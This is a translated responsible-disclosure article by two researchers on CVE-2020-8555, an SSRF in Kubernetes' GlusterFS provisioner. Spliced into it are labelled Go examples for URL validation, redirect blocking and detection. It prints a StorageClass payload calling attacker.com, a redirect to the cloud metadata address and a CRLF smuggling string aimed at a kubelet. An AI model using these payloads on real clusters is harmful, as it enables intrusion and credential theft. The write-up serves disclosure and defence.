Translator's note: in this article the authors describe in detail how they managed to discover the vulnerability.

Who are we?

We are two French security researchers who jointly discovered a vulnerability in Kubernetes. Our names are Brice Augras and Christophe Hauquiert, but on many bug bounty platforms we are known as Reeverzax and Hach respectively:

- Brice Augras - Asten Group;
- Christophe Hauquiert - Kubernetes architect at Nokia.

What happened?

This article is our way of sharing how an ordinary research project unexpectedly turned into the most exciting adventure in the lives of two bug hunters (at least so far).

As you probably know, bug hunters have a couple of notable traits:

- they live on pizza and beer;
- they work while everyone else is asleep.

We are no exception to these rules: we usually meet up on weekends and spend sleepless nights hacking. One of those nights, however, ended in a very unusual way.

Initially we had planned to meet simply to discuss our participation in an upcoming event. At 11 p.m. we sat down to do some research and then went to bed early, very satisfied with the results. It was thanks to this research that we came across the MSRC Bug Bounty programme and came up with a privilege escalation exploit.

A few weeks/months later, this unexpected result earned us, in addition to the reward we received from Kubernetes, one of the highest rewards in the history of the Azure Cloud Bug Bounty.

Following our research project, the Kubernetes Product Security Committee published a public disclosure, and we now want to spread as much information as possible about the vulnerability we found. We hope you will find the technical details interesting and share them with other members of the infosec community.

So, here is our story...
Context

To understand what happened, let's first look at how Kubernetes works in a cloud-managed environment.

When you instantiate a Kubernetes cluster in such an environment, the management layer is usually the responsibility of the cloud provider:

The control plane sits within the cloud provider's perimeter, while the Kubernetes nodes sit within the customer's perimeter.

To allocate volumes dynamically, a mechanism is used in which volumes are dynamically provisioned from an external storage backend and matched against PVCs (Persistent Volume Claims, i.e. requests for volumes).

Thus, after a PVC is created and bound to a StorageClass in the K8s cluster, the further actions needed to provide the volume are taken over by the kube/cloud controller manager (the exact name depends on the release). (Translator's note: we have already written about the CCM in more detail using the example of its implementation for one of the cloud providers.)

Kubernetes supports several kinds of provisioners; most of them are built into the orchestrator core. In our research, we focused on the built-in volume provisioning mechanism shown below:

[Figure: Dynamic provisioning of volumes using the built-in Kubernetes provisioner]

In short, when Kubernetes is deployed in a managed environment, the controller manager is the responsibility of the cloud provider, but the volume creation request (number 3 in the diagram above) leaves the cloud provider's internal network. And this is where it gets really interesting!
Hacking scenario

In this section we show how we used the workflow above to access the internal resources of the cloud service provider, and how specific actions, such as obtaining internal credentials or escalating privileges, could be performed.

A single simple manipulation (in this case server-side request forgery) let us go beyond the client environment and into the clusters of various service providers running managed K8s.

In our research we focused on the GlusterFS provisioner. Although the further sequence of actions is described in this context, Quobyte, StorageOS and ScaleIO are affected by the same vulnerability.

Abusing the dynamic volume provisioning mechanism

While analysing the storage class, we noticed in the source code of the GlusterFS Golang client that /volumes is appended to the resturl parameter. We decided to remove this additional path by appending # to the resturl parameter.

Here is the first YAML configuration we used to test for the half-blind SSRF vulnerability (semi-blind, or half-blind, SSRF is described in more detail elsewhere):
```yaml
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
  resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: poc-ssrf
spec:
  accessModes:
  - ReadWriteOnce
  volumeMode: Filesystem
  resources:
    requests:
      storage: 8Gi
  storageClassName: poc-ssrf
```
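The following Go program is an added example, not code from the original article or from Kubernetes/heketi. It reproduces the string-concatenation behaviour described above with Go's standard net/url (the `effectiveVolumesPath` helper mimics appending "/volumes" to a StorageClass `resturl`) and shows how a trailing `#` removes the suffix from what is actually sent on the wire. Beside it, `validateRestURL` is a hypothetical admission-style check that rejects fragments, control bytes (the CRLF case of scenario #3 later in the article), non-HTTP schemes and link-local or private IP literals such as the 169.254.169.254 metadata address. The function names, the sample URLs and the `attacker.example` host are constructed for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/url"
	"strings"
)

// effectiveVolumesPath mimics what the GlusterFS (heketi) Go client does with
// the StorageClass "resturl" parameter: "/volumes" is appended as a plain string
// and the result is handed to the HTTP stack. It returns the path+query that
// would actually be sent in the request line; a URL fragment never leaves the
// client, so "http://host/#" + "/volumes" is sent as a request for "/".
func effectiveVolumesPath(resturl string) (string, error) {
	u, err := url.Parse(resturl + "/volumes")
	if err != nil {
		return "", err
	}
	return u.RequestURI(), nil
}

// isInternalIP reports whether an IP literal points at an address a provisioner
// should never be steered to: loopback, link-local (169.254.0.0/16 holds the
// cloud metadata endpoint), RFC 1918 / ULA private space, or the unspecified address.
func isInternalIP(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsPrivate() || ip.IsUnspecified()
}

// validateRestURL is a hypothetical hardened check for a provisioner endpoint
// URL, of the kind an admission webhook or the provisioner itself could apply.
func validateRestURL(resturl string) error {
	// Reject CR, LF and other control bytes before parsing, so a value can never
	// be split into extra header lines or a second request.
	for i := 0; i < len(resturl); i++ {
		if resturl[i] < 0x20 || resturl[i] == 0x7f {
			return fmt.Errorf("resturl contains control byte 0x%02x at offset %d", resturl[i], i)
		}
	}
	u, err := url.Parse(resturl)
	if err != nil {
		return err
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return fmt.Errorf("resturl scheme %q not allowed", u.Scheme)
	}
	if u.Opaque != "" || u.User != nil {
		return errors.New("resturl must not carry opaque data or userinfo")
	}
	// url.Parse leaves Fragment empty for a bare trailing "#", so check the raw
	// string too: any "#" lets the caller drop the "/volumes" suffix.
	if u.Fragment != "" || strings.Contains(resturl, "#") {
		return errors.New("resturl must not contain a fragment")
	}
	host := u.Hostname()
	if host == "" {
		return errors.New("resturl has no host")
	}
	if ip := net.ParseIP(host); ip != nil && isInternalIP(ip) {
		return fmt.Errorf("resturl host %s is an internal address", host)
	}
	// NOTE: a DNS name can still resolve to an internal address; real code must
	// resolve it and re-run isInternalIP on every result, and again at dial time.
	return nil
}

func main() {
	// Constructed sample values for illustration.
	for _, s := range []string{
		"http://heketi.storage.svc.cluster.local:8080",
		"http://attacker.example:6666/#",
		"http://169.254.169.254",
		"http://10.0.0.5:10255/healthz?\r\nHost: x",
	} {
		p, _ := effectiveVolumesPath(s)
		fmt.Printf("%-48q -> request path %-10q check: %v\n", s, p, validateRestURL(s))
	}
}
```

The two checks are deliberately independent: the control-byte scan runs before parsing because parsers differ across Go versions in what they reject, and the literal `#` test runs in addition to `u.Fragment` because an empty fragment still truncates the appended path.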
Then we used the kubectl binary to manage the Kubernetes cluster remotely. Usually, cloud providers (Azure, Google, AWS, etc.) let you obtain credentials for use with this utility.

Thanks to this, we were able to apply our "special" file. Kube-controller-manager executed the resulting HTTP request:

```bash
kubectl create -f sc-poc.yaml
```

[Figure: Reaction from the attacker's point of view]

Shortly after that, we were also able to receive the HTTP response from the target server via the describe pvc or get events commands in kubectl. And indeed: this default Kubernetes driver is too verbose in its warning/error messages...

Here is an example with a link to https://www.google.fr set as the resturl parameter:

```bash
kubectl describe pvc poc-ssrf
# or you can use kubectl get events
```

With this approach we were limited to HTTP POST requests and could not obtain the contents of the response body if the return code was 201. So we decided to carry out additional research and extend this hacking scenario with new approaches.
Evolution of our research

- Advanced scenario #1: Using a 302 redirect from an external server to change the HTTP method, providing a more flexible way to collect internal data.
- Advanced scenario #2: Automating LAN scanning and internal resource discovery.
- Advanced scenario #3: Using HTTP CRLF + smuggling ("request smuggling") to craft custom HTTP requests and retrieve data extracted from the kube-controller logs.

Technical specifications

- The research used Azure Kubernetes Service (AKS) with Kubernetes version 1.12 in the North Europe region.
- The scenarios described above were run on the latest Kubernetes releases, except for the third one, which required Kubernetes built with Golang version 1.12 or lower.
- The attacker's external server: https://attacker.com.
Advanced scenario #1: Redirecting an HTTP POST request to GET and receiving sensitive data

The original method was improved by configuring the attacker's server to return a 302 HTTP status code, converting the POST request into a GET request (step 4 in the diagram):

The first request (3) from the GlusterFS client (controller manager) is of POST type. Following these steps, we were able to turn it into a GET:

- The resturl parameter in the StorageClass is set to http://attacker.com/redirect.php.
- The endpoint https://attacker.com/redirect.php responds with a 302 HTTP status code whose Location header points to http://169.254.169.254. This could be any other internal resource; here the redirect target is used only as an example.
- By default, Golang's net/http library follows the redirect and converts the POST into a GET on a 302 status code, resulting in an HTTP GET request to the target resource.
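As an added example (not code from the article or from Kubernetes), this Go program measures the redirect behaviour just described against a local httptest server instead of a real external host: with the default client, a POST to a 302 endpoint arrives at the target as a GET. `newGuardedClient` is a hypothetical hardening for a provisioner's HTTP client: its CheckRedirect hook refuses to follow a Location that points at a loopback, link-local or private address, or at any host not on an allowlist, and it does so before a connection to that target is opened. The server paths, the allowlist and all sample addresses are constructed.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/http"
	"net/http/httptest"
	"net/url"
	"sync"
)

// isInternalIP: loopback, link-local (metadata endpoint) and private ranges.
func isInternalIP(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsPrivate() || ip.IsUnspecified()
}

// newGuardedClient returns an http.Client whose CheckRedirect refuses to follow
// a redirect to an address a provisioner must not reach. The hook runs before
// the connection to the Location target is opened, so a blocked request never
// leaves the host. (Hypothetical helper, not Kubernetes code.)
func newGuardedClient(allowHosts map[string]bool) *http.Client {
	return &http.Client{
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			if len(via) >= 3 {
				return errors.New("blocked: too many redirects")
			}
			host := req.URL.Hostname()
			if allowHosts[host] {
				return nil
			}
			if ip := net.ParseIP(host); ip != nil && isInternalIP(ip) {
				return fmt.Errorf("blocked: redirect to internal address %s", host)
			}
			return fmt.Errorf("blocked: redirect to unlisted host %s", host)
		},
	}
}

// redirectTarget is a constructed stand-in for the attacker-controlled server
// in the text: /redirect answers 302 with the given Location (or back to its
// own /target when location is empty), and /target records the method that arrives.
type redirectTarget struct {
	srv      *httptest.Server
	mu       sync.Mutex
	seenMeth string
}

func newRedirectTarget(location string) *redirectTarget {
	rt := &redirectTarget{}
	mux := http.NewServeMux()
	mux.HandleFunc("/redirect", func(w http.ResponseWriter, r *http.Request) {
		loc := location
		if loc == "" {
			loc = rt.srv.URL + "/target"
		}
		http.Redirect(w, r, loc, http.StatusFound) // 302
	})
	mux.HandleFunc("/target", func(w http.ResponseWriter, r *http.Request) {
		rt.mu.Lock()
		rt.seenMeth = r.Method
		rt.mu.Unlock()
		fmt.Fprint(w, `{"ok":true}`)
	})
	rt.srv = httptest.NewServer(mux)
	return rt
}

// methodAfterRedirect sends a POST through client to /redirect and reports the
// method seen by /target ("" if the redirect was not followed) and any error.
func methodAfterRedirect(client *http.Client, location string) (string, error) {
	rt := newRedirectTarget(location)
	defer rt.srv.Close()
	resp, err := client.Post(rt.srv.URL+"/redirect", "application/json", nil)
	if err != nil {
		var uerr *url.Error
		if errors.As(err, &uerr) {
			err = uerr.Err // unwrap to the CheckRedirect error
		}
		return "", err
	}
	resp.Body.Close()
	rt.mu.Lock()
	defer rt.mu.Unlock()
	return rt.seenMeth, nil
}

func main() {
	m, err := methodAfterRedirect(http.DefaultClient, "")
	fmt.Println("default client, 302 to same host:", m, err)
	m, err = methodAfterRedirect(newGuardedClient(nil), "http://169.254.169.254/")
	fmt.Println("guarded client, 302 to metadata address:", m, err)
}
```

The guarded client keeps Go's own redirect handling (method rewriting, loop limits) and only adds a destination policy; an allowlist entry for the provisioner's real API host is the only way through, so a 302 from a tampered resturl cannot turn the controller manager into a client of the metadata service.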
To read the HTTP response body, you need to describe the PVC object:

```bash
kubectl describe pvc xxx
```

[Figure: example of a JSON-format HTTP response we were able to receive]

At this point the capabilities of the discovered vulnerability were limited by the following points:

- It was not possible to inject HTTP headers into the outgoing request.
- It was not possible to perform a POST request with parameters in the body (this would be convenient for requesting a key value from an etcd instance running on port 2379 if unencrypted HTTP is in use).
- It was not possible to retrieve the content of the response body when the status code was 200 and the response did not have a JSON Content-Type.
Advanced scenario #2: Scanning the local network

We then used this half-blind SSRF method to scan the cloud provider's internal network and poll the various listening services (metadata instance, Kubelet, etcd, etc.) based on the responses from the kube controller.

First, the standard listening ports of Kubernetes components (8443, 10250, 10251, etc.) were determined, and then the scanning process had to be automated.

Seeing that this method of scanning resources is very specific and not compatible with classic scanners and SSRF tools, we decided to write our own workers as a bash script that automates the whole process.

For example, to quickly scan the internal network range 172.16.0.0/12, 15 workers were launched in parallel. The IP range above was chosen as an example only and may vary depending on the IP range of the specific service provider.

To scan one IP address and one port, the following steps are required:

- delete the last checked StorageClass;
- delete the previously checked Persistent Volume Claim;
- change the IP and port values in sc.yaml;
- create a StorageClass with the new IP and port;
- create a new PVC;
- extract the scan results from the PVC description.
Advanced scenario #3: CRLF injection + HTTP smuggling in "old" versions of the Kubernetes cluster

Beyond that, if the provider offered clients an older version of the K8s cluster and allowed access to the kube-controller-manager logs, the impact became even more significant.

Indeed, it is far more convenient for an attacker to modify HTTP requests at will so that they receive a complete HTTP response.

To implement the last scenario, the following conditions had to be met:

- The user must have access to the kube-controller-manager logs (for example, Azure LogInsights).
- The Kubernetes cluster must use a Golang version older than 1.12.

We deployed a local environment that simulated the exchange between the GlusterFS Go client and a fake target server (we refrain from publishing the PoC for now).

We found that by combining the half-blind SSRF described above with CRLF injection, it became possible to send requests at will, with substituted headers, HTTP method, parameters and data, which kube-controller-manager then processed.

Here is an example of a working resturl parameter for a StorageClass that implements a similar attack scenario:
```
http://172.31.X.1:10255/healthz? HTTP/1.1\r\nConnection: keep-alive\r\nHost: 172.31.X.1:10255\r\nContent-Length: 1\r\n\r\n1\r\nGET /pods? HTTP/1.1\r\nHost: 172.31.X.1:10255\r\n\r\n
```
The result is an "unsolicited response" error, and a message about it is recorded in the controller logs. Thanks to the verbosity enabled by default, the contents of the HTTP response message are saved there as well.

This was the most effective piece of the proof of concept.

Using this approach, we were able to carry out some of the following attacks against the clusters of various managed K8s providers: privilege escalation using credentials from the metadata instance, master DoS via (unencrypted) HTTP requests to the etcd master instance, and so on.
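For defenders, the most visible trace of all three scenarios is the stream of ProvisioningFailed events the controller manager emits for each malicious PVC. The following Go program is an added example, not part of the article: it parses a few constructed event lines (tab-separated timestamp, namespace, reason, message; the message text only approximates the real controller-manager wording) and raises two kinds of alert: any provisioning failure that names an internal or link-local target, and a namespace that touches many distinct host:port targets within a short window, which is the footprint of the PVC-driven scanning in scenario #2. The thresholds, field names and sample data are assumptions.

```go
package main

import (
	"fmt"
	"net"
	"regexp"
	"sort"
	"strings"
	"time"
)

// Event is one provisioning-related Kubernetes event as it could be exported
// from the event stream or the controller-manager log (field names are ours).
type Event struct {
	When      time.Time
	Namespace string
	Reason    string
	Message   string
}

// Alert is what a detection run emits.
type Alert struct {
	Kind      string // "internal-target" or "scan-burst"
	Namespace string
	Detail    string
}

// urlHost captures the host[:port] of any http(s) URL echoed in a message.
var urlHost = regexp.MustCompile(`https?://([^/\s"'<>]+)`)

func isInternalIP(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsPrivate() || ip.IsUnspecified()
}

// parseEventLine reads a constructed tab-separated export line:
// RFC3339 time, namespace, reason, message.
func parseEventLine(line string) (Event, error) {
	f := strings.SplitN(line, "\t", 4)
	if len(f) != 4 {
		return Event{}, fmt.Errorf("malformed event line: %q", line)
	}
	ts, err := time.Parse(time.RFC3339, f[0])
	if err != nil {
		return Event{}, err
	}
	return Event{When: ts, Namespace: f[1], Reason: f[2], Message: f[3]}, nil
}

// DetectSSRF flags (a) every ProvisioningFailed event whose message mentions a
// URL with an internal or link-local host, and (b) a namespace that accumulates
// at least minTargets distinct host:port targets inside window.
func DetectSSRF(events []Event, window time.Duration, minTargets int) []Alert {
	var alerts []Alert
	type hit struct {
		when   time.Time
		target string
	}
	byNS := map[string][]hit{}
	for _, ev := range events {
		if ev.Reason != "ProvisioningFailed" {
			continue
		}
		for _, m := range urlHost.FindAllStringSubmatch(ev.Message, -1) {
			target := m[1]
			host := target
			if h, _, err := net.SplitHostPort(target); err == nil {
				host = h
			}
			if ip := net.ParseIP(host); ip != nil && isInternalIP(ip) {
				alerts = append(alerts, Alert{"internal-target", ev.Namespace, target})
			}
			byNS[ev.Namespace] = append(byNS[ev.Namespace], hit{ev.When, target})
		}
	}
	for ns, hits := range byNS {
		sort.Slice(hits, func(i, j int) bool { return hits[i].when.Before(hits[j].when) })
		// Sliding window over time-ordered hits, counting distinct targets.
		for i := range hits {
			seen := map[string]bool{}
			for j := i; j < len(hits) && hits[j].when.Sub(hits[i].when) <= window; j++ {
				seen[hits[j].target] = true
			}
			if len(seen) >= minTargets {
				alerts = append(alerts, Alert{"scan-burst", ns,
					fmt.Sprintf("%d distinct targets within %s", len(seen), window)})
				break
			}
		}
	}
	return alerts
}

// SampleEvents are constructed lines, not real cluster output.
var SampleEvents = []string{
	"2020-01-10T22:00:00Z\tdev\tProvisioningFailed\tfailed to create volume: Post http://heketi.storage.svc:8080/volumes: dial tcp: connection refused",
	"2020-01-10T22:01:00Z\ttenant-a\tProvisioningFailed\tfailed to create volume: Post http://169.254.169.254/: 404 Not Found",
	"2020-01-10T22:01:10Z\ttenant-a\tProvisioningFailed\tfailed to create volume: Post http://172.16.0.1:10250/: connection refused",
	"2020-01-10T22:01:20Z\ttenant-a\tProvisioningFailed\tfailed to create volume: Post http://172.16.0.1:10255/: 200 OK",
	"2020-01-10T22:01:30Z\ttenant-a\tProvisioningFailed\tfailed to create volume: Post http://172.16.0.2:2379/: connection refused",
	"2020-01-10T22:01:40Z\ttenant-a\tProvisioningFailed\tfailed to create volume: Post http://172.16.0.2:8443/: 403 Forbidden",
}

// RunSample parses the constructed events and runs the detector over them.
func RunSample() []Alert {
	var evs []Event
	for _, l := range SampleEvents {
		ev, err := parseEventLine(l)
		if err != nil {
			panic(err)
		}
		evs = append(evs, ev)
	}
	return DetectSSRF(evs, 10*time.Minute, 5)
}

func main() {
	for _, a := range RunSample() {
		fmt.Printf("%-16s ns=%-10s %s\n", a.Kind, a.Namespace, a.Detail)
	}
}
```

A real deployment would feed this from the Kubernetes event stream or the controller-manager log export and tune `minTargets` and `window` to the tenant's normal provisioning rate; the same host check applied at admission time to StorageClass parameters stops the request from being sent at all, so the event-based rule is the second line rather than the first.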
Consequences

The official Kubernetes statement about the SSRF vulnerability we discovered rated it CVSS 6.3/10: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N. If only the vulnerability within the Kubernetes perimeter is considered, the Integrity vector qualifies as None.

However, assessing the possible consequences in the context of a managed service environment (and this was the most interesting part of our research!) led us to reclassify the vulnerability as Critical, CVSS 10/10, for many distributors.

Below is additional information to help you understand the considerations when assessing potential impact in cloud environments.

Integrity

- Execute commands remotely using the obtained internal credentials.
- Reproduce the above scenario using the IDOR (Insecure Direct Object Reference) method with other resources found on the local network.

Confidentiality

- Attack type Lateral Movement due to the theft of cloud credentials (e.g. via the metadata API).
- Collect information by scanning the local network (determine SSH versions, HTTP server versions, etc.).
- Metadata API (http://169.254.169.254, ...).
- Steal customer data using cloud credentials.

Availability

All exploit scenarios related to the Integrity attack vector could be used for destructive actions and render the master instances of the client perimeter (or others) unavailable.

Since we were in a managed K8s environment and assessing the impact on integrity, we can imagine many scenarios that could affect availability. Further examples include corrupting the etcd database or making critical calls to the Kubernetes API.
Timeline

- December 6, 2019: Vulnerability reported to the MSRC Bug Bounty.
- January 3, 2020: A third party notified the Kubernetes developers that we were working on a security issue and asked them to treat the SSRF as an internal (in-core) vulnerability. We then provided a general report with technical details about the cause of the problem.
- January 15, 2020: At the request of the Kubernetes developers, we provided the technical and general reports (via the HackerOne platform).
- January 15, 2020: The Kubernetes developers notified us that the half-blind SSRF + CRLF injection in past releases was considered an in-core vulnerability. We immediately stopped analysing the perimeters of other service providers: the K8s team was now handling the root cause.
- January 15, 2020: MSRC reward received via HackerOne.
- January 16, 2020: The Kubernetes PSC (Product Security Committee) acknowledged the vulnerability and asked us to keep it secret until mid-March due to the large number of potential victims.
- February 11, 2020: Google VRP reward received.
- March 4, 2020: Kubernetes reward received via HackerOne.
- March 15, 2020: The originally scheduled public disclosure was postponed due to the COVID-19 pandemic.
- June 1, 2020: Joint statement by Kubernetes + Microsoft on the vulnerability.
TL;DR

- We drank beer and ate pizza :)
- We discovered an in-core Kubernetes vulnerability, although we had no intention of doing so.
- We carried out additional analysis on the clusters of various cloud providers and were able to increase the damage caused by the vulnerability, receiving additional great bonuses.
- You will find many technical details in this article. We would be happy to discuss them (Twitter: @ReeverZax & @__hach_).
- It turned out that all kinds of formalities and reporting took far longer than expected.

References

- Google Group kubernetes-security-announce;
- CVE-2020-8555;
- golang issue #30794;
- heketi/client/api/go-client/volume.go.

P.S. from the translator

Read also on our blog:

- "Kubernetes bug bounty officially opens";
- "A bug that causes Kubernetes pods to go down and terminate";
- "33+ Kubernetes security tools".

Source: habr.com